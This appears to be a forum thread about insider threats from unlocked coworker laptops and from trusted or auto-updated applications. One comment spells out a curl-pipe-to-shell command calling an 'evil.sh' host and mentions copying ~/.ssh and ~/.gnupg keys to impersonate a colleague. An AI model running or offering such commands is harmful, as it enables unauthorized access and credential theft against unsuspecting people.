|
|
|
|
|
|
by hkjgkjy
3447 days ago
|
|
|
Surely many of us have thought about how this is a very doable thing. Many of my coworkers often leave their laptops unlocked, unattended when they head for coffee or otherwise. Nothing stops me from running a quick command, forever allowing me access at any time the machine is on (it's only one `$ curl https://myhost.sh/evil.sh| sh` away. Or just copying their ~/.ssh (and maybe ~/.gnupg)). After having either shell access or copying those files, adding stuff to the code base in their names is trivial. Of course we don't do it, but it surprises me how uncommon it is. Must be human being are in general not assholes. Strangely, my non-programmer friends are surprised when I explain how one would do that, if they allowed me to run any code on their machine. |
|
|
Even Commercial applications can have employees that can embed code that give them access to the machine that the application is running on, think what a single application like TeamViewer can do on the target computer.
Yet, most people allow all apps to send and receive data from the internet unhinged even though they don't need it.
Then there is also automated updates, you may audit an app once, but as soon as it's updated, it's an entirely different application that need to be audited again.
I really do believe that we are going to see more of these cases as soon as some developer becomes desperate enough (like someone with mountains of debt and no way out) and start embedding things like ransomware or other types of blackmail.